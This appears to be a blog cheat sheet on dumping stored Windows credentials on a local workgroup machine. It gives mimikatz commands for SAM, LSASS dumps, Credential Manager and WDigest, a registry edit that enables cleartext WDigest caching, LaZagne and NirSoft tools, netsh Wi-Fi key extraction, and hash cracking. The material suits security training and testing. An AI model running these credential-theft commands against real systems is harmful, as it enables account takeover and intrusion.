Introduction
Password storing mechanism, ever since the
genesis of Windows, has been an angle of interest from security researcher’s
point of view and its implementation has often been criticized. However, newer versions
of Windows seem to have tried and tackled this problem in many parameters, but
we still can’t say that Windows’ password storage mechanism is one of the best
out there. In this article, which is the first installment in a three article
series, we’ll look for various mechanisms by which we can dump passwords of
various default applications in Windows if the system is part of a local work
group. Further parts in the series will focus on domain and active directory.
The purpose of this article is to serve as a quick reference guide for all the
dumping mechanisms in brief (like a cheat sheet) and detailed article’s
reference covering in depth options will be given for reader’s knowledge.
Before beginning, it must be noted that many other tools are also available in
the market but we’ll be only covering traditional tools. Here is what all you
can find in the article:
Table of Content:
1.
Dumping Windows logon passwords from SAM file
2.
Dumping Windows network, RDP and browser passwords from Windows Credential
Manager
3.
Dumping Windows auto login passwords
4.
Dumping Windows passwords from LSASS process (by creating LSA dump)
5.
Dumping Windows passwords using WDigest protocol
6.
Dumping Windows Wi-Fi passwords using netsh
Dumping Windows logon passwords from SAM file
SAM file – Security Account Manager (SAM) is a database file in Windows XP
and above that stores user’s password. It can be used to authenticate local and
remote users. The user passwords are stored in a hashed format in a registry
hive either as a LM hash or as an NTLM hash. This is present in %SystemRoot%/system32/config/SAM and LM protocol is
disabled in Windows Vista and above because it was proved to be a compromised
protocol. Technically, Sam cannot be copied or moved while Windows is running
since Windows kernel obtains and keeps an exclusive filesystem lock on the SAM
file and will not release the lock till it has been shut down, however, an in
memory copy of the SAM can be dumped using various techniques which are covered
in detail in the article here.
We’ll
be using mimikatz to dump SAM file. You can download mimikatz here.
Run it as administrator and then the commands are as follows:
privilege::debug
token::elevate
lsadump::sam
We’ll see that various hashes are now dumped
among which our user credentials are given too.
In this case, my user is raj and the windows password is 123. We have successfully obtained an NTLM hash and can crack it using various password cracking tools like john or hashcat.
Heading over to crackstation.net’s online NTLM cracker we are successfully able to crack the NTLM hash we just obtained.
It is to be noted that the passwords even after they are hashed, are not stored as it is. They are first double encrypted with the SAM registry hive, with parts of encryption keys in the SYSTEM registry hive.
In
Windows 7, RC4 encryption was used which is an obsolete algorithm and hence
Mimikatz used to dump hashes in clear text but ever since Windows 10
Anniversary Update v1607 has been out, Microsoft uses the AES-128 cipher for
encryption and hence, this made many password dumping tools obsolete. Many tools
were updated to tackle this issue and so did Mimikatz but this had the
disadvantage of Mimikatz sometimes not being able to give clear text password
dump and rather hashes.
Dumping Windows network, RDP and browser passwords from Windows
Credential Manager
Windows
credential manager is the place where Edge and Windows passwords are
stored. Any network protocol, OneDrive,
RDP, login etc passwords are stored here. What’s more is that the passwords are
easy to crack. You can check out the full article with other tools and methods here but we’ll be sticking to
mimikatz here. You can access credential manager in Control Panel→User
Accounts→ Credential Manager. Below, you can find that Facebook's
credentials are stored in my system which are visible.
Similarly, logon passwords stored would be visible like this:
We
can dump these credentials with the help of mimikatz command:
privilege::debug
sekurlsa::credman
And
just like that, we see a user “harshit” has a password “1234”
Similarly,
we can also use lazagne, another handy tool that you can download from here.
To
run lazagne, we type in:
lazagne.exe all
A
terminal might also have RDP password stored. To view stored RDP passwords
like in the following screenshot:
To
dump RDP passwords we’d use NirSoft’s Network Password Recovery which can be
downloaded here
And just like that, we have successfully dumped RDP password as well.
Dumping Windows auto login passwords
Windows
has a special feature of automatic login which enables users to login to the
windows system faster. While this feature is handy, one setback is that it can
be dumped as well. Let’s first set up an auto login in windows and then try to
dump it. To reach to the menu which sets this up, we’ll type in the following
in run prompt;
control userpasswords2
We’ll
see the following window upon successful completion of the command:
To
enable an account to auto login, we’ll simply uncheck the first option which is
by default checked.
While
we click apply, we’ll see a prompt that will ask us for the password once more.
After filling it up we’ll restart it to make sure the auto login is now
applied.
Now,
to dump auto login password, we’ll be using a small application developed by
NirSoft called Network Password Recovery which can be download from here.
Just
run the application and we’re good to go
Note
that it has only dumped the credential of current user because at a time only
one user can be auto logged in.
Dumping Windows passwords from LSASS process
LSASS process: Local Security Authority Subsystem Service is a process
in Microsoft Windows operating systems
that is responsible for enforcing the security policy on the system. It
verifies users logging on to a Windows computer or server, handles password
changes, and creates access tokens. It also writes to the Windows Security Log.
When a user attempts to
log on locally to the system by entering username and password in the logon
dialog box, the logon process invokes the LSA, which passes the user’s
credentials to the Security Accounts Manager (SAM), which manages the account
information stored in the local SAM database.
The SAM
compares the user’s credentials with the account information in the SAM
database to determine whether the user is authorized to access the system. If
it finds the user account information in the SAM database, the SAM
authenticates the user by creating a logon session and returning the security
identifier (SID) of the user and the SIDs of global groups of which the user is
a member to the LSA.
The LSA
then grants the user an access token that contains the user’s individual and
group SIDs and their rights; these enable the user to access resources for
which he or she has permissions.
What’s interesting is that LSA can be dumped and passwords
can be retrieved from a current session. To demonstrate this we first will
learn how to create an LSA dump manually.
Go to task manager and find lsass.exe file and
right click to create a dump file.
Store
this dump file in any location. Currently, we stored it in Temp directory but
while we run the command, we’ll copy it in C:\users\raj\Desktop\lsass.DMP
Now,
we’ll fire up Mimikatz and type in the following commands:
privilege::debug
sekurlsa::minidump C:\Users\raj\Desktop\lsass.DMP
sekurlsa::logonpasswords
And
sure enough we see a hashed password being dumped from the LSA dump file
Other
method to dump hashes from LSA is the patch method. To perform this, we type in
the following commands:
privilege::debug
lsadump::lsa /patch
This
hash is the same as previously obtained in method 1. Hence, the password is 123.
Note
that there are more methods of recovering passwords from LSA file. You can
follow the article here for numerous other ways.
Dumping Windows passwords using WDigest protocol
WDigest: It is a digest authentication challenge/response protocol
that was primarily used in Windows Server 2003 for LDAP and web based
authentication. It utilized HTTP and SASL exchange to authenticate. It worked
as follows:
Client→(requests access)→Authentication Server
Authentication Server→(challenges)→ Client
Client→(encrypts its reponse with key derived from password)→
Authenticating Server
Authenticating Server→ (compares response to a stored response)→
Determines if client has correct password or not
To
dump passwords using this method fire up Mimikatz as administrator and type in
following commands:
privilege::debug
sekurlsa::wdigest
It is to be noted that WDigest used to be enabled in Windows 7 and is by default disabled in Windows 10 but is not removed. So, to perform this practical on Windows 10 machine we’ll first have to enable WDigest. We can do so by following two methods:
Command line method:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1
gpupdate /force
Manual Method:
To
do this, we’ll have to traverse to the following path in our registry hive:
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest
Then,
right click→new→>add D word→ name it: UseLogonCredential
Then
modify the key and set it’s value as 1
After
this, it is absolutely essential to update group policy:
gpupdate /force
Restart
your PC now.
After
successful restart, upon running Mimikatz and the following commands we’d see
different result:
privilege::debug
sekurlsa::wdigest
Dumping Windows Wi-Fi passwords using netsh
All the wireless passwords with their respective
SSID are stored in an XML file in the location:
C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***
netsh: It is a
command-line scripting utility that allows you to display or modify the network
configuration of a computer that is currently running. Netsh commands can be run by typing commands at the netsh prompt and they can be used in
batch files or scripts.
To
get the list of the SSIDs that the device has been connected to use the
following command:
netsh wlan show profiles
And
as a result of the above command, you can see the names of the Wi-Fi networks
that the system was connected to in the past or present such as Meterpreter,
Linuxlab, etc. The same has been demonstrated in the image above.
Further, to know the passwords
of any one of the mentioned SSIDs use the following command :
netsh wlan show profile name=<SSID Name> key=clear
And
just like it is shown in the image above, the result of the above command will
give you the password
Conclusion
In
this article we demonstrated credential dumping methods of various default files/
directories present in Windows that contains passwords stored of many services
in Windows when the system is part of a local workgroup. Next article would
demonstrate to further dump passwords from a domain. Thanks for reading.
0 comments:
Post a Comment